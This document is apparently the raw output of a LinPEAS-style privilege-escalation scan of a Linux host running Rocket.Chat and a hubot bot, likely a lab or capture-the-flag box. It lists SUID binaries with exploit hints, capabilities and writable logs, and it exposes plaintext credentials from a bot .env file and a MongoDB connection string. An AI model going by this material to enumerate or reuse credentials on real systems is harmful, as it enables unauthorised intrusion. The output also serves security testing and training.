drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/meteor/logging/node_modules/es5-ext/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/meteor/logging/node_modules/es6-symbol/.github
drwxr-xr-x 2 rocketchat rocketchat 63 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/mime/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/needle/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/node-releases/.github
drwxr-xr-x 2 rocketchat rocketchat 26 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/npm-normalize-package-bin/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.entries/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.entries/node_modules/es-abstract/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.entries/node_modules/es-to-primitive/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.entries/node_modules/has-symbols/.github
drwxr-xr-x 3 rocketchat rocketchat 63 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.entries/node_modules/is-callable/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.entries/node_modules/is-regex/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.values/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.values/node_modules/es-abstract/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.values/node_modules/es-to-primitive/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.values/node_modules/has-symbols/.github
drwxr-xr-x 3 rocketchat rocketchat 63 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.values/node_modules/is-callable/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/object.values/node_modules/is-regex/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/react-app-polyfill/node_modules/promise/.github
drwxr-xr-x 2 rocketchat rocketchat 63 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/redis/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/string.prototype.trimend/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/string.prototype.trimend/node_modules/es-abstract/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/string.prototype.trimend/node_modules/es-to-primitive/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/string.prototype.trimend/node_modules/has-symbols/.github
drwxr-xr-x 3 rocketchat rocketchat 63 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/string.prototype.trimend/node_modules/is-callable/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/string.prototype.trimend/node_modules/is-regex/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/string.prototype.trimleft/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/string.prototype.trimright/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/string.prototype.trimstart/.github



drwx------ 8 dwight dwight 163 Jul  3  2021 /home/dwight/hubot/.git

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

-r--r-----. 1 root root 1147 Apr 20  2018 /etc/insights-client/redhattools.pub.gpg
-rw------- 1 dwight dwight 1200 Jul  3  2021 /home/dwight/.gnupg/trustdb.gpg
-rw-r--r-- 1 root root 9551 Jun 22  2018 /usr/lib/systemd/import-pubring.gpg
-rw-r--r-- 1 root root 3290 Jan  1  2020 /usr/share/gnupg/distsigkey.gpg
-rw-------. 1 root root 1200 Jul  3  2021 /var/cache/PackageKit/8/metadata/AppStream-8-x86_64/gpgdir/trustdb.gpg
-rw-------. 1 root root 1200 Jul  3  2021 /var/cache/PackageKit/8/metadata/BaseOS-8-x86_64/gpgdir/trustdb.gpg
-rw------- 1 root root 1200 Jul  3  2021 /var/cache/PackageKit/8/metadata/epel-8-x86_64/gpgdir/trustdb.gpg
-rw------- 1 root root 1200 Jul  3  2021 /var/cache/PackageKit/8/metadata/epel-modular-8-x86_64/gpgdir/trustdb.gpg
-rw-------. 1 root root 1200 Jul  3  2021 /var/cache/PackageKit/8/metadata/extras-8-x86_64/gpgdir/trustdb.gpg
-rw------- 1 root root 1200 Jul  3  2021 /var/cache/PackageKit/8/metadata/mongodb-org-4.0-8-x86_64/gpgdir/trustdb.gpg
-rw------- 1 root root 1200 Jul  3  2021 /var/cache/PackageKit/8/metadata/nodesource-8-x86_64/gpgdir/trustdb.gpg

drwx------ 3 dwight dwight 69 May 29 13:58 /home/dwight/.gnupg

╔══════════╣ Analyzing Cache Vi Files (limit 70)
-rw-r--r-- 1 rocketchat rocketchat 16384 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/meteor/konecty_user-presence/node_modules/colors/lib/.colors.js.swp
-rw-r--r-- 1 rocketchat rocketchat 16384 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/sharp/node_modules/semver/bin/.semver.js.swp
-rw-r--r-- 1 rocketchat rocketchat 16384 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/tar/lib/.mkdir.js.swp

-rw------- 1 dwight dwight 703 May 29 12:39 /home/dwight/.viminfo

╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation
runc was found in /usr/bin/runc, you may be able to escalate privileges with it

╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
-rw-r--r-- 1 root root 1261 Apr 30  2018 /usr/local/lib/node_modules/hubot-rocketchat/Dockerfile


╔══════════╣ Analyzing SNMP Files (limit 70)
-rw-------. 1 root root 18861 Jun 29  2021 /etc/snmp/snmpd.conf

╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r--. 1 root root 675 Apr 27  2017 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing Env Files (limit 70)
-rw-r--r-- 1 dwight dwight 258 Sep 16  2021 /home/dwight/hubot/.env
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1

╔══════════╣ Analyzing Rocketchat Files (limit 70)
lrwxrwxrwx. 1 root root 42 Jul  3  2021 /etc/systemd/system/multi-user.target.wants/rocketchat.service -> /usr/lib/systemd/system/rocketchat.service
Environment=MONGO_URL=mongodb://rocket:my$ecretPass@localhost:27017/rocketchat?replicaSet=rs01&authSource=rocketchat
Environment=MONGO_OPLOG_URL=mongodb://rocket:my$ecretPass@localhost:27017/local?replicaSet=rs01&authSource=admin
Environment=ROOT_URL=http://chat.office.paper
Environment=PORT=48320
Environment=BIND_IP=127.0.0.1
Environment=DEPLOY_PLATFORM=rocketchatctl
-rw-r--r-- 1 root root 673 Feb  1 09:25 /usr/lib/systemd/system/rocketchat.service
Environment=MONGO_URL=mongodb://rocket:my$ecretPass@localhost:27017/rocketchat?replicaSet=rs01&authSource=rocketchat
Environment=MONGO_OPLOG_URL=mongodb://rocket:my$ecretPass@localhost:27017/local?replicaSet=rs01&authSource=admin
Environment=ROOT_URL=http://chat.office.paper
Environment=PORT=48320
Environment=BIND_IP=127.0.0.1
Environment=DEPLOY_PLATFORM=rocketchatctl

╔══════════╣ Analyzing Strapi Files (limit 70)
drwxr-xr-x 2 rocketchat rocketchat 22 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/katex/src/environments







╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r--r--. 1 root root 22583074 May 29 13:47 /var/log/access.log

-rw-r--r--. 1 root root 4028894 May 29 13:47 /var/log/error.log

╔══════════╣ Analyzing Windows Files (limit 70)






















-rw-r--r--. 1 root root 269 Jul  3  2021 /etc/my.cnf









-rw-r--r-- 1 root root 475 Aug  9  2021 /usr/lib/firewalld/services/vnc-server.xml


















╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r--. 1 root root 376 Jul 27  2021 /etc/skel/.bashrc
-rw-r--r-- 1 dwight dwight 358 Jul  3  2021 /home/dwight/.bashrc











                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x. 1 root root 38K May 11  2019 /usr/bin/fusermount
-rwsr-xr-x 1 root root 78K Aug 18  2021 /usr/bin/chage
-rwsr-xr-x 1 root root 83K Aug 18  2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 43K Aug 18  2021 /usr/bin[1;31m/newgrp  --->  HP-UX_10.20[0m
-rwsr-xr-x 1 root root 50K Jul 21  2021 /usr/bin[1;31m/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8[0m
-rwsr-xr-x 1 root root 49K Jul 21  2021 /usr/bin/su
-rwsr-xr-x 1 root root 33K Jul 21  2021 /usr/bin[1;31m/umount  --->  BSD/Linux(08-1996)[0m
-rwsr-xr-x 1 root root 65K Nov  8  2019 /usr/bin/crontab
-rwsr-xr-x 1 root root 33K Apr  6  2020 /usr/bin[1;31m/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)[0m
-rws--x--x 1 root root 33K Jul 21  2021 /usr/bin[1;31m/chfn  --->  SuSE_9.3/10[0m
-rws--x--x 1 root root 25K Jul 21  2021 /usr/bin/chsh
-rwsr-xr-x. 1 root root 61K May 11  2019 /usr/bin[1;31m/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)[0m
---s--x--x 1 root root 162K Oct 25  2021 /usr/bin[1;31m/sudo  --->  check_if_the_sudo_version_is_vulnerable[0m
-rwsr-xr-x 1 root root 34K May 11  2019 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 12K Nov  8  2021 /usr/sbin/grub2-set-bootflag (Unknown SUID binary)
-rwsr-xr-x 1 root root 12K May  7  2021 /usr/sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 37K May  7  2021 /usr/sbin/unix_chkpwd
-rws--x--x 1 root root 45K Aug 27  2021 /usr/sbin/userhelper
-rwsr-xr-x 1 root root 196K Jul 30  2021 /usr/sbin/mount.nfs
-rwsr-xr-x. 1 root root 18K May 11  2019 /usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-x--- 1 root dbus 63K May  8  2021 /usr/libexec/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 17K Dec 21 15:04 /usr/libexec/qemu-bridge-helper (Unknown SUID binary)
-rwsr-x--- 1 root 973 58K Sep 10  2021 /usr/libexec/cockpit-session (Unknown SUID binary)
-rwsr-x--- 1 root sssd 161K Dec 21 15:14 /usr/libexec/sssd/krb5_child (Unknown SUID binary)
-rwsr-x--- 1 root sssd 96K Dec 21 15:14 /usr/libexec/sssd/ldap_child (Unknown SUID binary)
-rwsr-x--- 1 root sssd 25K Dec 21 15:14 /usr/libexec/sssd/proxy_child (Unknown SUID binary)
-rwsr-x--- 1 root sssd 55K Dec 21 15:14 /usr/libexec/sssd/selinux_child (Unknown SUID binary)
-rwsr-xr-x 1 root root 21K Feb  2  2021 /usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper (Unknown SUID binary)
-rwsr-xr-x 1 root root 13K Jun 10  2021 /usr/libexec/Xorg.wrap

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root tty 21K Jul 21  2021 /usr/bin/write
-rwx--s--x. 1 root slocate 48K May 11  2019 /usr/bin/locate
-rwx--s--x. 1 root lock 22K May 11  2019 /usr/sbin/lockdev
-rwx--s--x. 1 root utmp 14K May 10  2019 /usr/libexec/utempter/utempter
-r-xr-sr-x 1 root ssh_keys 445K Jul 13  2021 /usr/libexec/openssh/ssh-keysign

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include ld.so.conf.d/*.conf
ld.so.conf.d
  ld.so.conf.d/*

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current capabilities:
Current: =
CapInh:	0000000000000000
CapPrm:	0000000000000000
CapEff:	0000000000000000
CapBnd:	000001ffffffffff
CapAmb:	0000000000000000

Shell capabilities:
0x0000000000000000=
CapInh:	0000000000000000
CapPrm:	0000000000000000
CapEff:	0000000000000000
CapBnd:	000001ffffffffff
CapAmb:	0000000000000000

Files with capabilities (limited to 50):
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/mtr-packet = cap_net_raw+ep
/usr/libexec/mysqld = cap_sys_nice+ep

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/lesspipe.sh
/usr/bin/amuFormat.sh
/usr/bin/gettext.sh
/usr/bin/setup-nsssysinit.sh
/usr/bin/rescan-scsi-bus.sh

╔══════════╣ Unexpected in /opt (usually empty)
total 0
drwxr-xr-x.  3 root       root        25 Jun 22  2021 .
dr-xr-xr-x. 17 root       root       244 Jan 17 11:37 ..
drwxr-xr-x   4 rocketchat rocketchat 107 Jan 14 06:02 Rocket.Chat

╔══════════╣ Unexpected in root
/.autorelabel

╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 124
drwxr-xr-x.   2 root root 4096 Jan 14 04:53 .
drwxr-xr-x. 145 root root 8192 May 29 13:56 ..
-rw-r--r--.   1 root root 1336 Jun 15  2020 PackageKit.sh
-rw-r--r--.   1 root root  664 May 11  2019 bash_completion.sh
-rw-r--r--.   1 root root  196 May 10  2019 colorgrep.csh
-rw-r--r--.   1 root root  201 May 10  2019 colorgrep.sh
-rw-r--r--.   1 root root 1741 Jul 14  2021 colorls.csh
-rw-r--r--.   1 root root 1606 Jul 14  2021 colorls.sh
-rw-r--r--.   1 root root  162 May 10  2019 colorxzgrep.csh
-rw-r--r--.   1 root root  183 May 10  2019 colorxzgrep.sh
-rw-r--r--.   1 root root  216 Jan 13  2021 colorzgrep.csh
-rw-r--r--.   1 root root  220 Jan 13  2021 colorzgrep.sh
-rw-r--r--.   1 root root   80 May 15  2020 csh.local
-rw-r--r--.   1 root root  813 Jan 13  2021 flatpak.sh
-rw-r--r--.   1 root root 1107 Dec 14  2017 gawk.csh
-rw-r--r--.   1 root root  757 Dec 14  2017 gawk.sh
-rw-r--r--.   1 root root  102 Oct 15  2021 iproute2.sh
-rw-r--r--.   1 root root 2486 May 15  2020 lang.csh
-rw-r--r--.   1 root root 2312 May 15  2020 lang.sh
-rw-r--r--.   1 root root  500 May 11  2019 less.csh
-rw-r--r--.   1 root root  253 May 11  2019 less.sh
-rw-r--r--.   1 root root   81 May 15  2020 sh.local
-rw-r--r--.   1 root root  204 May  8  2021 ssh-x-forwarding.csh
-rw-r--r--.   1 root root  225 May  8  2021 ssh-x-forwarding.sh
-rw-r--r--.   1 root root  106 Sep 22  2021 vim.csh
-rw-r--r--.   1 root root  248 Sep 22  2021 vim.sh
-rw-r--r--.   1 root root 2092 Jun 16  2020 vte.sh
-rw-r--r--.   1 root root  120 May 17  2021 which2.csh
-rw-r--r--.   1 root root  478 May 17  2021 which2.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service

╔══════════╣ Readable files belonging to root and readable by me but not world readable

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/etc/group
/etc/gshadow
/etc/subgid
/etc/subuid
/var/log/wtmp
/var/log/mongodb/mongod.log
/var/log/messages
/var/log/btmp
/var/log/cron
/var/log/secure
/var/tmp/dnf-dwight-tbkfiypm/dnf.log
/var/tmp/dnf-dwight-tbkfiypm/dnf.librepo.log
/var/tmp/dnf-dwight-tbkfiypm/dnf.rpm.log
/var/tmp/dnf-dwight-tbkfiypm/expired_repos.json
/var/tmp/dnf-dwight-tbkfiypm/hawkey.log
/home/dwight/hubot/.hubot.log
/home/dwight/.dbshell

╔══════════╣ Writable log files (logrotten) (limit 100)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0

    Default mail command:       /bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/logrotate.status
    ACL support:                yes
    SELinux support:            yes
Writable: /var/tmp/dnf-dwight-tbkfiypm/dnf.log
Writable: /var/tmp/dnf-dwight-tbkfiypm/dnf.librepo.log
Writable: /var/tmp/dnf-dwight-tbkfiypm/dnf.rpm.log

╔══════════╣ Files inside /home/dwight (limit 20)
total 48
drwx------  12 dwight dwight 4096 May 29 13:56 .
drwxr-xr-x.  3 root   root     20 May 29 13:56 ..
lrwxrwxrwx   1 dwight dwight    9 Jul  3  2021 .bash_history -> /dev/null
-rw-r--r--   1 dwight dwight   18 May 10  2019 .bash_logout
-rw-r--r--   1 dwight dwight  141 May 10  2019 .bash_profile
-rw-r--r--   1 dwight dwight  358 Jul  3  2021 .bashrc
drwx------   5 dwight dwight   56 Jul  3  2021 .config
-rw-------   1 dwight dwight   36 May 29 13:58 .dbshell
-rw-------   1 dwight dwight   16 Jul  3  2021 .esd_auth
drwx------   3 dwight dwight   69 May 29 13:58 .gnupg
-rw-rw-r--   1 dwight dwight   18 Sep 16  2021 .hubot_history
drwx------   3 dwight dwight   19 Jul  3  2021 .local
drwxr-xr-x   4 dwight dwight   39 Jul  3  2021 .mozilla
drwxrwxr-x   5 dwight dwight   83 Jul  3  2021 .npm
-rw-------   1 dwight dwight    0 May 29 13:16 .python_history
drwxrwxr-x   2 dwight dwight   50 May 29 13:57 .r3pek
drwx------   2 dwight dwight   29 May 29 12:23 .ssh
drwxr-xr-x   2 dwight dwight   24 Sep 16  2021 .vim
-rw-------   1 dwight dwight  703 May 29 12:39 .viminfo
-rwxr-xr-x   1 dwight dwight 1174 Sep 16  2021 bot_restart.sh
drwx------   8 dwight dwight 4096 Sep 16  2021 hubot
drwxr-xr-x   4 dwight dwight   32 Jul  3  2021 sales

╔══════════╣ Files inside others home (limit 20)

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)
  9281720      0 -rw-rw----   1  rpc      mail            0 Jul  3  2021 /var/mail/rpc
 10152432      0 -rw-rw----   1  1000     mail            0 Jul  3  2021 /var/mail/nick
 11176001      0 -rw-rw----   1  rocketchat mail            0 Jul  3  2021 /var/mail/rocketchat
 11074260      0 -rw-rw----   1  1002     mail            0 Jul  3  2021 /var/mail/dwight
  9281720      0 -rw-rw----   1  rpc        mail            0 Jul  3  2021 /var/spool/mail/rpc
 10152432      0 -rw-rw----   1  1000     mail            0 Jul  3  2021 /var/spool/mail/nick
 11176001      0 -rw-rw----   1  rocketchat mail            0 Jul  3  2021 /var/spool/mail/rocketchat
 11074260      0 -rw-rw----   1  1002     mail            0 Jul  3  2021 /var/spool/mail/dwight

╔══════════╣ Backup folders

╔══════════╣ Backup files (limited 100)
-rw-r--r--. 1 root root 1498 May 13  2019 /etc/nsswitch.conf.bak
-rw-r--r--. 1 root root 163 Jul  3  2021 /etc/httpd/conf.d/office.htb.conf.bak
-rw-r--r--. 1 root root 8720 May 20  2021 /etc/httpd/conf.d/ssl.conf.bak
-rw-r--r--. 1 root root 2516 Jun  4  2019 /usr/lib/modules/4.18.0-80.el8.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz
-rw-r--r--. 1 root root 2432 Dec 22 08:39 /usr/lib/modules/4.18.0-348.7.1.el8_5.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz
-rw-r--r-- 2 root root 1393 Aug 12  2021 /usr/lib/python3.6/site-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-36.opt-1.pyc
-rw-r--r-- 2 root root 1393 Aug 12  2021 /usr/lib/python3.6/site-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-36.pyc
-rw-r--r-- 1 root root 1775 Feb 25  2021 /usr/lib/python3.6/site-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 7138 Feb 13  2018 /usr/lib/node_modules/node-gyp/node_modules/form-data/README.md.bak
-rw-r--r-- 1 root root 7138 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/form-data/README.md.bak
-rwxr-xr-x. 1 root root 38024 Sep  1  2021 /usr/lib64/mysql/plugin/component_mysqlbackup.so
-rwxr-xr-x. 1 root root 8136 Sep  1  2021 /usr/lib64/mysql/plugin/component_test_backup_lock_service.so
-rwxr-xr-x. 1 root root 41808 May 27  2021 /usr/lib64/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 305 Jul 26  2020 /usr/share/doc/teamd/example_configs/activebackup_arp_ping_1.conf
-rw-r--r-- 1 root root 465 Jul 26  2020 /usr/share/doc/teamd/example_configs/activebackup_arp_ping_2.conf
-rw-r--r-- 1 root root 194 Jul 26  2020 /usr/share/doc/teamd/example_configs/activebackup_ethtool_1.conf
-rw-r--r-- 1 root root 212 Jul 26  2020 /usr/share/doc/teamd/example_configs/activebackup_ethtool_2.conf
-rw-r--r-- 1 root root 241 Jul 26  2020 /usr/share/doc/teamd/example_configs/activebackup_ethtool_3.conf
-rw-r--r-- 1 root root 447 Jul 26  2020 /usr/share/doc/teamd/example_configs/activebackup_multi_lw_1.conf
-rw-r--r-- 1 root root 285 Jul 26  2020 /usr/share/doc/teamd/example_configs/activebackup_nsna_ping_1.conf
-rw-r--r-- 1 root root 318 Jul 26  2020 /usr/share/doc/teamd/example_configs/activebackup_tipc.conf
-rw-r--r--. 1 root root 17711 Aug  6  2006 /usr/share/doc/mcpp/ChangeLog.old
-rw-r--r--. 1 root root 41508 Mar  9  2006 /usr/share/doc/pinfo/ChangeLog.old
-rw-r--r-- 1 root root 2670 Dec  8  2016 /usr/share/man/man1/db_hotbackup.1.gz
-r--r--r-- 1 root root 2900 Sep 22  2021 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r--. 1 root root 1815 Jul 29  2017 /usr/share/help/C/gnome-help/backup-check.page
-rw-r--r--. 1 root root 1999 Jan  5  2017 /usr/share/help/C/gnome-help/backup-frequency.page
-rw-r--r--. 1 root root 2356 Jan  5  2017 /usr/share/help/C/gnome-help/backup-how.page
-rw-r--r--. 1 root root 1320 Sep 18  2012 /usr/share/help/C/gnome-help/backup-restore.page
-rw-r--r--. 1 root root 3318 Apr 11  2017 /usr/share/help/C/gnome-help/backup-thinkabout.page
-rw-r--r--. 1 root root 2505 Jan  5  2017 /usr/share/help/C/gnome-help/backup-what.page
-rw-r--r--. 1 root root 2268 Jul 29  2017 /usr/share/help/C/gnome-help/backup-where.page
-rw-r--r--. 1 root root 1262 Jan  5  2017 /usr/share/help/C/gnome-help/backup-why.page
-rw-r--r--. 1 root root 2615 May 13  2019 /usr/share/help/as/gnome-help/backup-check.page
-rw-r--r--. 1 root root 3643 May 13  2019 /usr/share/help/as/gnome-help/backup-frequency.page
-rw-r--r--. 1 root root 4242 May 13  2019 /usr/share/help/as/gnome-help/backup-how.page
-rw-r--r--. 1 root root 2601 May 13  2019 /usr/share/help/as/gnome-help/backup-restore.page
-rw-r--r--. 1 root root 4650 May 13  2019 /usr/share/help/as/gnome-help/backup-thinkabout.page
-rw-r--r--. 1 root root 4854 May 13  2019 /usr/share/help/as/gnome-help/backup-what.page
-rw-r--r--. 1 root root 3430 May 13  2019 /usr/share/help/as/gnome-help/backup-where.page
-rw-r--r--. 1 root root 1660 May 13  2019 /usr/share/help/as/gnome-help/backup-why.page
-rw-r--r--. 1 root root 2210 May 13  2019 /usr/share/help/ca/gnome-help/backup-check.page
-rw-r--r--. 1 root root 2674 May 13  2019 /usr/share/help/ca/gnome-help/backup-frequency.page
-rw-r--r--. 1 root root 3007 May 13  2019 /usr/share/help/ca/gnome-help/backup-how.page
-rw-r--r--. 1 root root 1740 May 13  2019 /usr/share/help/ca/gnome-help/backup-restore.page
-rw-r--r--. 1 root root 3986 May 13  2019 /usr/share/help/ca/gnome-help/backup-thinkabout.page
-rw-r--r--. 1 root root 3215 May 13  2019 /usr/share/help/ca/gnome-help/backup-what.page
-rw-r--r--. 1 root root 2824 May 13  2019 /usr/share/help/ca/gnome-help/backup-where.page
-rw-r--r--. 1 root root 1685 May 13  2019 /usr/share/help/ca/gnome-help/backup-why.page
-rw-r--r--. 1 root root 2363 May 13  2019 /usr/share/help/cs/gnome-help/backup-check.page
-rw-r--r--. 1 root root 2601 May 13  2019 /usr/share/help/cs/gnome-help/backup-frequency.page
-rw-r--r--. 1 root root 2883 May 13  2019 /usr/share/help/cs/gnome-help/backup-how.page
-rw-r--r--. 1 root root 1858 May 13  2019 /usr/share/help/cs/gnome-help/backup-restore.page
-rw-r--r--. 1 root root 3996 May 13  2019 /usr/share/help/cs/gnome-help/backup-thinkabout.page
-rw-r--r--. 1 root root 3127 May 13  2019 /usr/share/help/cs/gnome-help/backup-what.page
-rw-r--r--. 1 root root 2857 May 13  2019 /usr/share/help/cs/gnome-help/backup-where.page
-rw-r--r--. 1 root root 1892 May 13  2019 /usr/share/help/cs/gnome-help/backup-why.page
-rw-r--r--. 1 root root 1856 May 13  2019 /usr/share/help/da/gnome-help/backup-check.page
-rw-r--r--. 1 root root 2040 May 13  2019 /usr/share/help/da/gnome-help/backup-frequency.page
-rw-r--r--. 1 root root 2397 May 13  2019 /usr/share/help/da/gnome-help/backup-how.page
-rw-r--r--. 1 root root 1362 May 13  2019 /usr/share/help/da/gnome-help/backup-restore.page
-rw-r--r--. 1 root root 3311 May 13  2019 /usr/share/help/da/gnome-help/backup-thinkabout.page
-rw-r--r--. 1 root root 2546 May 13  2019 /usr/share/help/da/gnome-help/backup-what.page
-rw-r--r--. 1 root root 2309 May 13  2019 /usr/share/help/da/gnome-help/backup-where.page
-rw-r--r--. 1 root root 1302 May 13  2019 /usr/share/help/da/gnome-help/backup-why.page
-rw-r--r--. 1 root root 3251 May 13  2019 /usr/share/help/de/gnome-help/backup-check.page
-rw-r--r--. 1 root root 3436 May 13  2019 /usr/share/help/de/gnome-help/backup-frequency.page
-rw-r--r--. 1 root root 3818 May 13  2019 /usr/share/help/de/gnome-help/backup-how.page
-rw-r--r--. 1 root root 2735 May 13  2019 /usr/share/help/de/gnome-help/backup-restore.page
-rw-r--r--. 1 root root 4939 May 13  2019 /usr/share/help/de/gnome-help/backup-thinkabout.page
-rw-r--r--. 1 root root 4021 May 13  2019 /usr/share/help/de/gnome-help/backup-what.page
-rw-r--r--. 1 root root 3706 May 13  2019 /usr/share/help/de/gnome-help/backup-where.page
-rw-r--r--. 1 root root 2649 May 13  2019 /usr/share/help/de/gnome-help/backup-why.page
-rw-r--r--. 1 root root 4349 May 13  2019 /usr/share/help/el/gnome-help/backup-check.page
